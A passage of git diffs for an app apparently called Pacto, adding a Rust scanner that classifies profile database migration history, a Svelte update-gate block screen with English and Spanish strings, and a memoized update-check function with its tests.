+pub(crate) struct StorageFormatScanReport {
+    pub(crate) all_recognized: bool,
+    pub(crate) unrecognized_count: usize,
+    pub(crate) highest_offending_version: Option<i32>,
+}
+
+/// Scan every `npub1*` profile directory's `vector.db` under `app_data_dir`.
+/// A profile with no database file classifies `Fresh` and is not counted.
+/// Bounded by `SCAN_DEADLINE`: a profile reached after the deadline is left
+/// unscanned rather than blocking launch on a slow disk.
+pub(crate) fn scan_profiles(app_data_dir: &Path) -> StorageFormatScanReport {
+    let deadline = Instant::now() + SCAN_DEADLINE;
+    let mut unrecognized_count = 0usize;
+    let mut highest_offending_version: Option<i32> = None;
+
+    if let Ok(entries) = std::fs::read_dir(app_data_dir) {
+        for entry in entries.flatten() {
+            if Instant::now() >= deadline {
+                break;
+            }
+            let path = entry.path();
+            let is_profile_dir = path.is_dir()
+                && entry
+                    .file_name()
+                    .to_str()
+                    .is_some_and(|name| name.starts_with("npub1"));
+            if !is_profile_dir {
+                continue;
+            }
+
+            let verdict = classify_database(&path.join("vector.db"));
+            if let StorageFormatVerdict::Unrecognized(version)
+            | StorageFormatVerdict::Divergent(version) = verdict
+            {
+                unrecognized_count += 1;
+                highest_offending_version =
+                    Some(highest_offending_version.map_or(version, |max| max.max(version)));
+            }
+        }
+    }
+
+    StorageFormatScanReport {
+        all_recognized: unrecognized_count == 0,
+        unrecognized_count,
+        highest_offending_version,
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn fixture_migration(version: i32, name: &str, checksum: u64) -> refinery::Migration {
+        refinery::Migration::applied(
+            version,
+            name.to_string(),
+            time::OffsetDateTime::now_utc(),
+            checksum,
+        )
+    }
+
+    fn fixture_embedded(count: i32) -> Vec<refinery::Migration> {
+        (1..=count)
+            .map(|v| fixture_migration(v, &format!("m{v}"), v as u64))
+            .collect()
+    }
+
+    fn fixture_row(version: i32, name: &str, checksum: &str) -> HistoryRow {
+        HistoryRow {
+            version,
+            name: name.to_string(),
+            checksum: checksum.to_string(),
+        }
+    }
+
+    fn unique_temp_dir(label: &str) -> std::path::PathBuf {
+        let nonce = std::time::SystemTime::now()
+            .duration_since(std::time::UNIX_EPOCH)
+            .unwrap()
+            .as_nanos();
+        std::env::temp_dir().join(format!(
+            "pacto-storage-format-{label}-{}-{nonce}",
+            std::process::id()
+        ))
+    }
+
+    fn write_migrated_db(path: &Path) {
+        let mut conn = rusqlite::Connection::open(path).unwrap();
+        crate::migrations::run_migrations(&mut conn).unwrap();
+    }
+
+    // -- pure classify_history ------------------------------------------
+
+    #[test]
+    fn full_match_is_recognized() {
+        let embedded = fixture_embedded(3);
+        let applied = vec![
+            fixture_row(1, "m1", "1"),
+            fixture_row(2, "m2", "2"),
+            fixture_row(3, "m3", "3"),
+        ];
+        assert_eq!(
+            classify_history(&applied, true, true, &embedded),
+            StorageFormatVerdict::Recognized
+        );
+    }
+
+    #[test]
+    fn row_above_highest_embedded_is_unrecognized() {
+        let embedded = fixture_embedded(3);
+        let mut applied: Vec<HistoryRow> = (1..=3)
+            .map(|v| fixture_row(v, &format!("m{v}"), &v.to_string()))
+            .collect();
+        applied.push(fixture_row(4, "m4", "4"));
+        assert_eq!(
+            classify_history(&applied, true, true, &embedded),
+            StorageFormatVerdict::Unrecognized(4)
+        );
+    }
+
+    #[test]
+    fn checksum_mismatch_is_divergent() {
+        let embedded = fixture_embedded(3);
+        let applied = vec![
+            fixture_row(1, "m1", "1"),
+            fixture_row(2, "m2", "not-the-real-checksum"),
+            fixture_row(3, "m3", "3"),
+        ];
+        assert_eq!(
+            classify_history(&applied, true, true, &embedded),
+            StorageFormatVerdict::Divergent(2)
+        );
+    }
+
+    #[test]
+    fn name_mismatch_is_divergent() {
+        let embedded = fixture_embedded(3);
+        let applied = vec![
+            fixture_row(1, "m1", "1"),
+            fixture_row(2, "renamed", "2"),
+            fixture_row(3, "m3", "3"),
+        ];
+        assert_eq!(
+            classify_history(&applied, true, true, &embedded),
+            StorageFormatVerdict::Divergent(2)
+        );
+    }
+
+    #[test]
+    fn embedded_migration_missing_from_history_below_max_is_divergent() {
+        let embedded = fixture_embedded(3);
+        let applied = vec![fixture_row(1, "m1", "1"), fixture_row(3, "m3", "3")];
+        assert_eq!(
+            classify_history(&applied, true, true, &embedded),
+            StorageFormatVerdict::Divergent(2)
+        );
+    }
+
+    #[test]
+    fn empty_history_with_table_present_is_recognized() {
+        let embedded = fixture_embedded(3);
+        assert_eq!(
+            classify_history(&[], true, true, &embedded),
+            StorageFormatVerdict::Recognized
+        );
+    }
+
+    #[test]
+    fn settings_without_history_is_pre_refinery() {
+        let embedded = fixture_embedded(3);
+        assert_eq!(
+            classify_history(&[], false, true, &embedded),
+            StorageFormatVerdict::PreRefinery
+        );
+    }
+
+    #[test]
+    fn neither_table_is_fresh() {
+        let embedded = fixture_embedded(3);
+        assert_eq!(
+            classify_history(&[], false, false, &embedded),
+            StorageFormatVerdict::Fresh
+        );
+    }
+
+    #[test]
+    fn checksum_mismatch_on_middle_row_is_divergent_not_missed() {
+        let embedded = fixture_embedded(5);
+        let mut applied: Vec<HistoryRow> = (1..=5)
+            .map(|v| fixture_row(v, &format!("m{v}"), &v.to_string()))
+            .collect();
+        applied[2].checksum = "corrupted".to_string(); // version 3, not the highest (5)
+        assert_eq!(
+            classify_history(&applied, true, true, &embedded),
+            StorageFormatVerdict::Divergent(3)
+        );
+    }
+
+    // -- real connections -------------------------------------------------
+
+    #[test]
+    fn real_migrated_database_is_recognized_and_untouched() {
+        let mut conn = rusqlite::Connection::open_in_memory().unwrap();
+        crate::migrations::run_migrations(&mut conn).unwrap();
+
+        let (_, before) = read_history_table(&conn, "refinery_schema_history").unwrap();
+
+        let verdict = classify_connection(&conn).unwrap();
+        assert_eq!(verdict, StorageFormatVerdict::Recognized);
+
+        let (_, after) = read_history_table(&conn, "refinery_schema_history").unwrap();
+        assert_eq!(before, after);
+    }
+
+    #[test]
+    fn pre_refinery_classification_ignores_settings_table_shape() {
+        let dir = unique_temp_dir("pre-refinery-shape");
+        std::fs::create_dir_all(&dir).unwrap();
+        let path = dir.join("vector.db");
+        let conn = rusqlite::Connection::open(&path).unwrap();
+        // A `settings` table shaped nothing like the real schema -- the
+        // classifier must not care about structure, only that it exists.
+        conn.execute_batch("CREATE TABLE settings (weird_column TEXT);")
+            .unwrap();
+        conn.execute(
+            "INSERT INTO settings (weird_column) VALUES ('anything')",
+            [],
+        )
+        .unwrap();
+        drop(conn);
+
+        assert_eq!(classify_database(&path), StorageFormatVerdict::PreRefinery);
+
+        let _ = std::fs::remove_dir_all(&dir);
+    }
+
+    #[test]
+    fn absent_file_is_fresh() {
+        let path = unique_temp_dir("absent").join("vector.db");
+        assert_eq!(classify_database(&path), StorageFormatVerdict::Fresh);
+    }
+
+    #[test]
+    fn unreadable_file_classifies_as_recognized() {
+        let dir = unique_temp_dir("truncated");
+        std::fs::create_dir_all(&dir).unwrap();
+        let path = dir.join("vector.db");
+        std::fs::write(&path, b"not a sqlite file").unwrap();
+
+        assert_eq!(classify_database(&path), StorageFormatVerdict::Recognized);
+
+        let _ = std::fs::remove_dir_all(&dir);
+    }
+
+    #[test]
+    fn busy_database_classifies_as_recognized() {
+        let dir = unique_temp_dir("busy");
+        std::fs::create_dir_all(&dir).unwrap();
+        let path = dir.join("vector.db");
+
+        let holder = rusqlite::Connection::open(&path).unwrap();
+        holder
+            .execute_batch(
+                "CREATE TABLE refinery_schema_history (version INTEGER PRIMARY KEY, \
+                 name VARCHAR(255), applied_on VARCHAR(255), checksum VARCHAR(255));",
+            )
+            .unwrap();
+        holder.execute_batch("BEGIN EXCLUSIVE;").unwrap();
+
+        assert_eq!(classify_database(&path), StorageFormatVerdict::Recognized);
+
+        drop(holder);
+        let _ = std::fs::remove_dir_all(&dir);
+    }
+
+    // -- scan_profiles ------------------------------------------------------
+
+    #[test]
+    fn scan_ignores_profile_without_vector_db() {
+        let root = unique_temp_dir("scan-no-db");
+        std::fs::create_dir_all(root.join("npub1scannodbprofile")).unwrap();
+
+        let report = scan_profiles(&root);
+        assert!(report.all_recognized);
+        assert_eq!(report.unrecognized_count, 0);
+        assert_eq!(report.highest_offending_version, None);
+
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn scan_reports_unrecognized_profile_and_offending_version() {
+        let root = unique_temp_dir("scan-unrecognized");
+        let profile_dir = root.join("npub1scanunrecognizedprofile");
+        std::fs::create_dir_all(&profile_dir).unwrap();
+        let db_path = profile_dir.join("vector.db");
+        write_migrated_db(&db_path);
+
+        let above_ceiling = crate::migrations::embedded_ceiling() + 1;
+        {
+            let conn = rusqlite::Connection::open(&db_path).unwrap();
+            conn.execute(
+                "INSERT INTO refinery_schema_history (version, name, applied_on, checksum) \
+                 VALUES (?1, 'future_migration', '2026-01-01T00:00:00Z', 'deadbeef')",
+                rusqlite::params![above_ceiling],
+            )
+            .unwrap();
+        }
+
+        let report = scan_profiles(&root);
+        assert!(!report.all_recognized);
+        assert_eq!(report.unrecognized_count, 1);
+        assert_eq!(report.highest_offending_version, Some(above_ceiling));
+
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn scan_counts_multiple_unrecognized_profiles() {
+        let root = unique_temp_dir("scan-multi");
+        let good_dir = root.join("npub1scanmultigood");
+        std::fs::create_dir_all(&good_dir).unwrap();
+        write_migrated_db(&good_dir.join("vector.db"));
+
+        let above_ceiling = crate::migrations::embedded_ceiling() + 1;
+        let mut offending_versions = Vec::new();
+        for (label, bump) in [("a", 0), ("b", 1)] {
+            let dir = root.join(format!("npub1scanmulti{label}"));
+            std::fs::create_dir_all(&dir).unwrap();
+            let db_path = dir.join("vector.db");
+            write_migrated_db(&db_path);
+            let version = above_ceiling + bump;
+            let conn = rusqlite::Connection::open(&db_path).unwrap();
+            conn.execute(
+                "INSERT INTO refinery_schema_history (version, name, applied_on, checksum) \
+                 VALUES (?1, 'future_migration', '2026-01-01T00:00:00Z', 'deadbeef')",
+                rusqlite::params![version],
+            )
+            .unwrap();
+            offending_versions.push(version);
+        }
+
+        let report = scan_profiles(&root);
+        assert!(!report.all_recognized);
+        assert_eq!(report.unrecognized_count, 2);
+        assert_eq!(
+            report.highest_offending_version,
+            offending_versions.iter().max().copied()
+        );
+
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    // -- no leaking identity ----------------------------------------------
+
+    #[test]
+    fn report_and_verdicts_carry_no_identifying_data() {
+        let verdicts = [
+            StorageFormatVerdict::Fresh,
+            StorageFormatVerdict::PreRefinery,
+            StorageFormatVerdict::Recognized,
+            StorageFormatVerdict::Unrecognized(42),
+            StorageFormatVerdict::Divergent(7),
+        ];
+        for verdict in verdicts {
+            let debug = format!("{verdict:?}");
+            assert!(!debug.contains("npub1"));
+            assert!(!debug.contains('/'));
+            assert!(!debug.contains('\\'));
+        }
+
+        let report = StorageFormatScanReport {
+            all_recognized: false,
+            unrecognized_count: 2,
+            highest_offending_version: Some(31),
+        };
+        let debug = format!("{report:?}");
+        assert!(!debug.contains("npub1"));
+        assert!(!debug.contains('/'));
+        assert!(!debug.contains('\\'));
+    }
+
+    // -- embedded-set completeness -----------------------------------------
+
+    #[test]
+    fn embedded_set_matches_committed_migration_files() {
+        let embedded = crate::migrations::embedded_migration_set();
+        assert!(!embedded.is_empty());
+        assert!(crate::migrations::embedded_ceiling() >= crate::migrations::PRE_REFINERY_CEILING);
+
+        let migrations_dir =
+            std::path::Path::new(env!("CARGO_MANIFEST_DIR")).join("src/migrations");
+        let mut file_versions = std::collections::BTreeSet::new();
+        for entry in std::fs::read_dir(&migrations_dir).unwrap() {
+            let entry = entry.unwrap();
+            let file_name = entry.file_name().to_string_lossy().to_string();
+            if let Some(rest) = file_name.strip_prefix('V') {
+                if let Some((version_str, _)) = rest.split_once("__") {
+                    if let Ok(version) = version_str.parse::<i32>() {
+                        file_versions.insert(version);
+                    }
+                }
+            }
+        }
+
+        let embedded_versions: std::collections::BTreeSet<i32> =
+            embedded.iter().map(|m| m.version()).collect();
+        assert_eq!(embedded_versions, file_versions);
+    }
+}

--- a/src/components/updater/UpdateGate.svelte
+++ b/src/components/updater/UpdateGate.svelte
@@ -1,0 +1,205 @@
+<script lang="ts">
+  import { onMount, tick, type Snippet } from 'svelte';
+  import { t } from 'svelte-i18n';
+  import { gateState, resolveGateAtLaunch } from '../../lib/updater/update-gate';
+  import { updateStatus, retryUpdateCheck } from '../../lib/updater/update-check';
+  import { openExternalUrl } from '../../lib/utils/open-external';
+  import UpdateAvailablePanel from './UpdateAvailablePanel.svelte';
+
+  // Compile-time constant, deliberately never derived from the (unsigned)
+  // updater manifest - this screen is non-dismissible with an urgent
+  // audience, the worst possible place to render an attacker-supplied link.
+  const RELEASE_PAGE_URL = 'https://github.com/covenant-gov/pacto-app/releases/latest';
+
+  let { children }: { children: Snippet } = $props();
+
+  let panelEl: HTMLDivElement | undefined = $state();
+
+  onMount(() => {
+    void resolveGateAtLaunch();
+  });
+
+  $effect(() => {
+    if ($gateState.status !== 'blocked' || !panelEl) return;
+    void tick().then(() => {
+      const focusTarget =
+        panelEl?.querySelector<HTMLElement>('a[href], button:not([disabled]), input, [tabindex]') ?? panelEl;
+      focusTarget?.focus();
+    });
+  });
+
+  function handleRetry(): void {
+    void retryUpdateCheck();
+  }
+
+  function handleReleasePageClick(event: MouseEvent): void {
+    event.preventDefault();
+    void openExternalUrl(RELEASE_PAGE_URL);
+  }
+
+  const hasLiveInstallAction = $derived(
+    $updateStatus.status === 'available' ||
+      $updateStatus.status === 'downloading' ||
+      $updateStatus.status === 'installing' ||
+      $updateStatus.status === 'installed' ||
+      $updateStatus.status === 'error',
+  );
+</script>
+
+{#if $gateState.status === 'resolving'}
+  <!-- Matches Login.svelte's own checking-screen exactly: markup, colors,
+       copy. Login mounts and shows this same treatment the instant the
+       gate clears, so two visually different spinners in sequence never
+       read as a reload. -->
+  <div class="checking-screen" role="status" aria-live="polite">
+    <div class="checking-spinner"></div>
+    <p class="checking-text">{$t('auth.checkingAccount')}</p>
+  </div>
+{:else if $gateState.status === 'blocked'}
+  {@const state = $gateState}
+  <div class="gate-block-screen">
+    <div
+      class="gate-block-panel"
+      role="alertdialog"
+      aria-live="assertive"
+      aria-labelledby="update-gate-title"
+      aria-describedby="update-gate-description"
+      tabindex="-1"
+      bind:this={panelEl}
+    >
+      <h2 id="update-gate-title">
+        {state.reason === 'minimum-version'
+          ? $t('updater.gate.minimumVersionTitle')
+          : $t('updater.gate.storageFormatTitle')}
+      </h2>
+      <p id="update-gate-description">
+        {#if state.reason === 'minimum-version'}
+          {$t('updater.gate.minimumVersionDescription', {
+            values: { installed: state.installedVersion, required: state.requiredVersion ?? '' },
+          })}
+        {:else}
+          {$t('updater.gate.storageFormatDescription', { values: { count: state.unrecognizedCount } })}
+        {/if}
+      </p>
+
+      {#if hasLiveInstallAction}
+        <UpdateAvailablePanel />
+      {:else if state.reason === 'minimum-version'}
+        <div class="gate-block-fallback">
+          <button type="button" class="btn-primary" onclick={handleRetry}>
+            {$t('updater.gate.retry')}
+          </button>
+          <a href={RELEASE_PAGE_URL} onclick={handleReleasePageClick}>
+            {$t('updater.gate.releasePageLink')}
+          </a>
+        </div>
+      {:else}
+        <div class="gate-block-fallback">
+          <p class="gate-block-nontransient">{$t('updater.gate.storageFormatNonTransient')}</p>
+        </div>
+      {/if}
+    </div>
+  </div>
+{:else}
+  {@render children()}
+{/if}
+
+<style>
+  .checking-screen {
+    display: flex;
+    flex-direction: column;
+    align-items: center;
+    justify-content: center;
+    width: 100%;
+    height: 100vh;
+    gap: 16px;
+    background: var(--bg-page, #1c1c1c);
+  }
+
+  .checking-spinner {
+    width: 48px;
+    height: 48px;
+    border: 4px solid var(--border-subtle, #313338);
+    border-top-color: var(--accent, #5865f2);
+    border-radius: 50%;
+    animation: spin 1s linear infinite;
+  }
+
+  .checking-text {
+    color: var(--text-secondary, #dbdee1);
+    font-size: 0.9375rem;
+    margin: 0;
+  }
+
+  @keyframes spin {
+    to { transform: rotate(360deg); }
+  }
+
+  .gate-block-screen {
+    display: flex;
+    align-items: center;
+    justify-content: center;
+    width: 100%;
+    height: 100vh;
+    padding: 32px;
+    background: var(--bg-page, #1c1c1c);
+  }
+
+  .gate-block-panel {
+    display: flex;
+    flex-direction: column;
+    gap: 16px;
+    width: 100%;
+    max-width: 440px;
+    padding: 32px;
+    border-radius: 12px;
+    background: var(--bg-secondary, #2b2d31);
+    border: 1px solid var(--border-subtle, #313338);
+  }
+
+  .gate-block-panel:focus {
+    outline: none;
+  }
+
+  #update-gate-title {
+    margin: 0;
+    color: var(--text-primary, #f2f3f5);
+    font-size: 1.25rem;
+  }
+
+  #update-gate-description {
+    margin: 0;
+    color: var(--text-secondary, #dbdee1);
+    font-size: 0.9375rem;
+    line-height: 1.5;
+  }
+
+  .gate-block-fallback {
+    display: flex;
+    flex-direction: column;
+    gap: 12px;
+  }
+
+  .gate-block-nontransient {
+    margin: 0;
+    color: var(--text-secondary, #dbdee1);
+    font-size: 0.9375rem;
+    line-height: 1.5;
+  }
+
+  .gate-block-fallback a {
+    color: var(--accent, #5865f2);
+    font-size: 0.875rem;
+  }
+
+  .btn-primary {
+    padding: 10px 16px;
+    border: none;
+    border-radius: 8px;
+    background: var(--accent, #5865f2);
+    color: white;
+    font-size: 0.9375rem;
+    font-weight: 600;
+    cursor: pointer;
+  }
+</style>

--- a/src/components/updater/UpdateGate.svelte
+++ b/src/components/updater/UpdateGate.svelte
@@ -2,7 +2,7 @@
   import { tick, type Snippet } from 'svelte';
   import { t } from 'svelte-i18n';
   import { gateState } from '../../lib/updater/update-gate';
-  import { updateStatus, retryUpdateCheck } from '../../lib/updater/update-check';
+  import { updateStatus, checkForUpdates } from '../../lib/updater/update-check';
   import { openExternalUrl } from '../../lib/utils/open-external';
   import UpdateAvailablePanel from './UpdateAvailablePanel.svelte';
 
@@ -25,7 +25,7 @@
   });
 
   function handleRetry(): void {
-    void retryUpdateCheck();
+    void checkForUpdates();
   }
 
   function handleReleasePageClick(event: MouseEvent): void {

--- a/src/components/updater/UpdateGate.svelte
+++ b/src/components/updater/UpdateGate.svelte
@@ -1,7 +1,7 @@
 <script lang="ts">
-  import { onMount, tick, type Snippet } from 'svelte';
+  import { tick, type Snippet } from 'svelte';
   import { t } from 'svelte-i18n';
-  import { gateState, resolveGateAtLaunch } from '../../lib/updater/update-gate';
+  import { gateState } from '../../lib/updater/update-gate';
   import { updateStatus, retryUpdateCheck } from '../../lib/updater/update-check';
   import { openExternalUrl } from '../../lib/utils/open-external';
   import UpdateAvailablePanel from './UpdateAvailablePanel.svelte';
@@ -14,10 +14,6 @@
   let { children }: { children: Snippet } = $props();
 
   let panelEl: HTMLDivElement | undefined = $state();
-
-  onMount(() => {
-    void resolveGateAtLaunch();
-  });
 
   $effect(() => {
     if ($gateState.status !== 'blocked' || !panelEl) return;

--- a/src/lib/api/auth.ts
+++ b/src/lib/api/auth.ts
@@ -49,6 +49,22 @@ export async function checkAnyAccountExists(): Promise<boolean> {
 }
 
 /**
+ * Report whether this build recognizes every local profile's storage
+ * format on disk. Called before authentication; the launch gate blocks on
+ * `allRecognized === false` rather than routing to onboarding or unlock.
+ */
+export interface StorageCompatibilityReport {
+  allRecognized: boolean;
+  unrecognizedCount: number;
+  highestOffendingVersion: number | null;
+  supportedSchemaVersion: number;
+}
+
+export async function getStorageCompatibility(): Promise<StorageCompatibilityReport> {
+  return await invoke('get_storage_compatibility');
+}
+
+/**
  * Get the current active account npub
  * @returns Current account npub or error
  */

--- a/src/lib/api/mock-fixtures.ts
+++ b/src/lib/api/mock-fixtures.ts
@@ -26,6 +26,12 @@ export const authFixtures: Record<string, MockCommandHandler> = {
   },
   connect: () => true,
   check_any_account_exists: () => mockState.encryptedKey !== null,
+  get_storage_compatibility: () => ({
+    allRecognized: true,
+    unrecognizedCount: 0,
+    highestOffendingVersion: null,
+    supportedSchemaVersion: 0,
+  }),
   get_current_account: () => (mockState.encryptedKey ? MOCK_NPUB : ''),
   get_evm_address: () => mockState.evmAddress,
   set_evm_address: (args) => {

--- a/src/lib/i18n/locales/en/updater.json
+++ b/src/lib/i18n/locales/en/updater.json
@@ -11,5 +11,12 @@
 	"updater.primary.downloading": "Downloading…",
 	"updater.primary.installing": "Installing…",
 	"updater.primary.retry": "Retry",
-	"updater.primary.downloadAndInstall": "Download and install"
+	"updater.primary.downloadAndInstall": "Download and install",
+	"updater.gate.minimumVersionTitle": "Update required",
+	"updater.gate.minimumVersionDescription": "This release ({installed}) is no longer supported. Update to at least {required} to continue.",
+	"updater.gate.storageFormatTitle": "This build cannot open your data",
+	"updater.gate.storageFormatDescription": "Your data was written by a newer version of Pacto. {count, plural, one {One profile is} other {# profiles are}} affected on this machine, and every account is blocked until it is resolved.",
+	"updater.gate.storageFormatNonTransient": "This is not a temporary problem, and retrying will not help. Update to the version that wrote this data, or see the manual recovery steps in the operator documentation.",
+	"updater.gate.retry": "Retry",
+	"updater.gate.releasePageLink": "View the latest release"
 }

--- a/src/lib/i18n/locales/es/updater.json
+++ b/src/lib/i18n/locales/es/updater.json
@@ -11,5 +11,12 @@
 	"updater.primary.downloading": "Descargando…",
 	"updater.primary.installing": "Instalando…",
 	"updater.primary.retry": "Reintentar",
-	"updater.primary.downloadAndInstall": "Descargar e instalar"
+	"updater.primary.downloadAndInstall": "Descargar e instalar",
+	"updater.gate.minimumVersionTitle": "Actualización requerida",
+	"updater.gate.minimumVersionDescription": "Esta versión ({installed}) ya no es compatible. Actualiza al menos a {required} para continuar.",
+	"updater.gate.storageFormatTitle": "Esta versión no puede abrir tus datos",
+	"updater.gate.storageFormatDescription": "Tus datos fueron escritos por una versión más reciente de Pacto. {count, plural, one {Hay 1 perfil afectado} other {Hay # perfiles afectados}} en esta máquina, y todas las cuentas están bloqueadas hasta resolverlo.",
+	"updater.gate.storageFormatNonTransient": "Esto no es un problema temporal y reintentar no ayudará. Actualiza a la versión que escribió estos datos, o consulta los pasos de recuperación manual en la documentación para operadores.",
+	"updater.gate.retry": "Reintentar",
+	"updater.gate.releasePageLink": "Ver la última versión"
 }

--- a/src/lib/updater/update-check.test.ts
+++ b/src/lib/updater/update-check.test.ts
@@ -10,6 +10,7 @@ import {
   updateStatus,
   resetUpdateStatus,
   resetMemoizedUpdateCheckForTest,
+  getMemoizedUpdateCheck,
   setIsDevBuildForTest,
   buildCommitHash,
   buildVersion,
@@ -55,6 +56,46 @@ function expectStatus(status: UpdateState['status'], extra?: Partial<UpdateState
     }
   }
 }
+
+describe('getMemoizedUpdateCheck', () => {
+  it('coalesces concurrent callers into one underlying check() call', async () => {
+    setIsDevBuildForTest(false);
+    const { promise, resolve } = Promise.withResolvers<UpdaterUpdate>();
+    mockedCheck.mockReturnValue(promise);
+
+    const first = getMemoizedUpdateCheck();
+    const second = getMemoizedUpdateCheck();
+    resolve({ version: '0.3.0' } as UpdaterUpdate);
+
+    const [firstResult, secondResult] = await Promise.all([first, second]);
+    expect(mockedCheck).toHaveBeenCalledTimes(1);
+    expect(firstResult).toBe(secondResult);
+  });
+
+  it('makes a fresh request after a successful call settles', async () => {
+    setIsDevBuildForTest(false);
+    mockedCheck.mockResolvedValueOnce({ version: '0.3.0' } as UpdaterUpdate);
+    await getMemoizedUpdateCheck();
+
+    mockedCheck.mockResolvedValueOnce({ version: '0.4.0' } as UpdaterUpdate);
+    const second = await getMemoizedUpdateCheck();
+
+    expect(mockedCheck).toHaveBeenCalledTimes(2);
+    expect(second).toEqual({ version: '0.4.0' });
+  });
+
+  it('makes a fresh request after a rejection settles - a retry is not stuck replaying the same failure', async () => {
+    setIsDevBuildForTest(false);
+    mockedCheck.mockRejectedValueOnce(new Error('network unreachable'));
+    await expect(getMemoizedUpdateCheck()).rejects.toThrow('network unreachable');
+
+    mockedCheck.mockResolvedValueOnce({ version: '0.3.0' } as UpdaterUpdate);
+    const retry = await getMemoizedUpdateCheck();
+
+    expect(mockedCheck).toHaveBeenCalledTimes(2);
+    expect(retry).toEqual({ version: '0.3.0' });
+  });
+});
 
 describe('checkForUpdates', () => {
   it('falls back to the build version when getVersion() returns 0.0.0', async () => {

--- a/src/lib/updater/update-check.test.ts
+++ b/src/lib/updater/update-check.test.ts
@@ -9,6 +9,7 @@ import {
   relaunchApp,
   updateStatus,
   resetUpdateStatus,
+  resetMemoizedUpdateCheckForTest,
   setIsDevBuildForTest,
   buildCommitHash,
   buildVersion,
@@ -38,6 +39,7 @@ const mockedShowToast = vi.mocked(showToast);
 beforeEach(() => {
   vi.resetAllMocks();
   resetUpdateStatus();
+  resetMemoizedUpdateCheckForTest();
 });
 
 afterEach(() => {

--- a/src/lib/updater/update-check.ts
+++ b/src/lib/updater/update-check.ts
@@ -33,16 +33,29 @@ export type UpdaterUpdate = Awaited<ReturnType<typeof check>>;
 let memoizedCheckPromise: Promise<UpdaterUpdate> | null = null;
 
 /**
- * The launch-time manifest check, called at most once per launch. Both the
- * update gate and `checkForUpdates` consult this instead of calling
- * `check()` directly, so one launch makes one round trip and the courtesy
- * startup check can never race a second, independent result into
- * `updateStatus`. Dev builds resolve `null` without a network call, since
+ * The launch-time manifest check, shared by the update gate and
+ * `checkForUpdates` so genuinely concurrent callers within one launch make
+ * one round trip rather than racing independent results into
+ * `updateStatus`. The memo clears itself the moment this call settles
+ * (resolved or rejected) - it only coalesces callers overlapping in time,
+ * never pins every later call (a manual "check for updates" click, a retry
+ * after a transient failure) to a stale result for the rest of the
+ * session. Dev builds resolve `null` without a network call, since
  * `check()` has no manifest to read in dev.
  */
 export function getMemoizedUpdateCheck(): Promise<UpdaterUpdate> {
   if (!memoizedCheckPromise) {
-    memoizedCheckPromise = isDevBuild() ? Promise.resolve(null) : check();
+    const promise = isDevBuild() ? Promise.resolve(null) : check();
+    const clearIfCurrent = () => {
+      if (memoizedCheckPromise === promise) memoizedCheckPromise = null;
+    };
+    // `.then(f, f)` rather than `.finally(f)`: finally's derived promise
+    // re-rejects on a rejected source with nothing consuming it, which is
+    // an unhandled-rejection warning waiting to happen. Passing an
+    // onRejected handler here marks the rejection handled without
+    // affecting the original `promise` returned below.
+    promise.then(clearIfCurrent, clearIfCurrent);
+    memoizedCheckPromise = promise;
   }
   return memoizedCheckPromise;
 }
@@ -163,17 +176,6 @@ export async function checkForUpdates(): Promise<void> {
     const message = friendlyErrorMessage(err);
     updateStatus.setStatus('error', { error: message });
   }
-}
-
-/**
- * Force a fresh manifest check, bypassing the per-launch memo. For an
- * explicit user-initiated retry (e.g. the update gate's block screen),
- * where a second network attempt is a deliberate choice rather than
- * passive launch-time behavior.
- */
-export function retryUpdateCheck(): Promise<void> {
-  memoizedCheckPromise = null;
-  return checkForUpdates();
 }
 
 let downloadTotalBytes = 0;

--- a/src/lib/updater/update-check.ts
+++ b/src/lib/updater/update-check.ts
@@ -30,6 +30,28 @@ export function setIsDevBuildForTest(value: boolean): void {
 
 export type UpdaterUpdate = Awaited<ReturnType<typeof check>>;
 
+let memoizedCheckPromise: Promise<UpdaterUpdate> | null = null;
+
+/**
+ * The launch-time manifest check, called at most once per launch. Both the
+ * update gate and `checkForUpdates` consult this instead of calling
+ * `check()` directly, so one launch makes one round trip and the courtesy
+ * startup check can never race a second, independent result into
+ * `updateStatus`. Dev builds resolve `null` without a network call, since
+ * `check()` has no manifest to read in dev.
+ */
+export function getMemoizedUpdateCheck(): Promise<UpdaterUpdate> {
+  if (!memoizedCheckPromise) {
+    memoizedCheckPromise = isDevBuild() ? Promise.resolve(null) : check();
+  }
+  return memoizedCheckPromise;
+}
+
+/** Test-only: force the next call to make a fresh `check()` call. */
+export function resetMemoizedUpdateCheckForTest(): void {
+  memoizedCheckPromise = null;
+}
+
 export type UpdateStatus =
   | 'idle'
   | 'checking'
@@ -125,7 +147,7 @@ export async function checkForUpdates(): Promise<void> {
   updateStatus.setStatus('checking', { currentVersion, availableVersion: null, error: null });
 
   try {
-    const update = await check();
+    const update = await getMemoizedUpdateCheck();
     if (!update) {
       updateStatus.setStatus('no-update', { currentVersion });
       return;

--- a/src/lib/updater/update-check.ts
+++ b/src/lib/updater/update-check.ts
@@ -165,6 +165,17 @@ export async function checkForUpdates(): Promise<void> {
   }
 }
 
+/**
+ * Force a fresh manifest check, bypassing the per-launch memo. For an
+ * explicit user-initiated retry (e.g. the update gate's block screen),
+ * where a second network attempt is a deliberate choice rather than
+ * passive launch-time behavior.
+ */
+export function retryUpdateCheck(): Promise<void> {
+  memoizedCheckPromise = null;
+  return checkForUpdates();
+}
+
 let downloadTotalBytes = 0;
 let downloadedBytes = 0;
 

--- a/src/lib/updater/update-gate.test.ts
+++ b/src/lib/updater/update-gate.test.ts
@@ -1,0 +1,332 @@
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest';
+import { get } from 'svelte/store';
+
+vi.mock('../api/auth', () => ({
+  getStorageCompatibility: vi.fn(),
+}));
+
+vi.mock('./update-check', () => ({
+  resolveInstalledVersion: vi.fn(),
+  getMemoizedUpdateCheck: vi.fn(),
+  updateStatus: { setStatus: vi.fn() },
+}));
+
+import { getStorageCompatibility } from '../api/auth';
+import { getMemoizedUpdateCheck, resolveInstalledVersion, updateStatus } from './update-check';
+import { isInstalledBelowMinimum } from './version-compare';
+import {
+  awaitGateBeforeAuth,
+  freezeGate,
+  gateState,
+  resetGateForTest,
+  resolveGateAtLaunch,
+  type GateState,
+} from './update-gate';
+
+const mockedGetStorageCompatibility = vi.mocked(getStorageCompatibility);
+const mockedResolveInstalledVersion = vi.mocked(resolveInstalledVersion);
+const mockedGetMemoizedUpdateCheck = vi.mocked(getMemoizedUpdateCheck);
+const mockedSetStatus = vi.mocked(updateStatus.setStatus);
+
